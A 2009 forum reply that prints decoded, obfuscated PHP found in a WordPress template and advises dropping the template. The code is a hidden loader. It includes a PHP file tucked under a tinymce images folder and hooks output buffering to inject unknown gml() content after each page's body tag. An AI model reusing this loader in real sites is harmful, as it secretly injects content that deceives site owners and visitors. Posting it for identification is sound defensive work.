View Single Post
Old 23 January, 2009, 02:24 AM   #8 (permalink)
Mr.Bill Mr.Bill is offline
One is glad to be of service
 
Mr.Bill's Avatar
 
iTrader: (9)
Blog Entries: 1
Thanked 275 Times in 137 Posts
Posts: 715
Recent Blog: Diaper Rash
$NetBucks: 80
Join Date: Dec 2008
Last Online: 30 November, 2009 04:21 AM
Send a message via MSN to Mr.Bill
Default

Cant say dont understand what that is doing but here is what it was decoded

Code:
if(function_exists("ob_start") && !isset($GLOBALS["sh_no"]))
{
    $GLOBALS["sh_no"]=1;
    $R6B6E98CDE8B33087A33E4D3A497BD86B="/blog1/wp-includes/js/tinymce/themes/advanced/images/xp/js.php";
    if(file_exists($R6B6E98CDE8B33087A33E4D3A497BD86B))
    {
        include_once($R6B6E98CDE8B33087A33E4D3A497BD86B);
    }
    if(!function_exists("gzdecode"))
    {
        function gzdecode($R20FD65E9C7406034FADC682F06732868)
        {
            $R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
            $R60169CD1C47B7A7A85AB44F884635E41=10;
            $R0D54236DA20594EC13FC81B209733931=0;
            if($R6B6E98CDE8B33087A33E4D3A497BD86B&4)
            {
                $R0D54236DA20594EC13FC81B209733931=unpack("v",substr($R20FD65E9C7406034FADC682F06732868,10,2));
                $R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];
                $R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;
            }
            if($R6B6E98CDE8B33087A33E4D3A497BD86B&8)
            {
                $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
            }
            if($R6B6E98CDE8B33087A33E4D3A497BD86B&16)
            {
                $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
            }
            if($R6B6E98CDE8B33087A33E4D3A497BD86B&2)
            {
                $R60169CD1C47B7A7A85AB44F884635E41+=2;
            }
            $RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
            if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE)
            {
                $RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;
            }
            return $RC4A5B5E310ED4C323E04D72AFAE39F53;
        }
    }
    if(function_exists("gml") && !function_exists("dgobh"))
    {
        function dgobh($RDA3E61414E50AEE968132F03D265E0CF)
        {
            Header("Content-Encoding: none");
            $R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
            if(preg_match("/\<body/si",$R3E33E017CD76B9B7E6C7364FB91E2E90))
            {
                return preg_replace("/(\<body[^\>]*\>)/si","$1".gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
            }
            else
            {
                return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
            }
        }
        ob_start("dgobh");
    }
}
Personally I would look for a different template and ditch this one unless you can get an experienced coder to weed through it and remove whatever is causing that
__________________
Myspace Proxy ಠ_ಠ Reverse IP Check ಠ_ಠ Proxy Sites
Proxy Locator Proxy List
  Reply With Quote
Thanked by:
writtenstyle.com (23 January, 2009)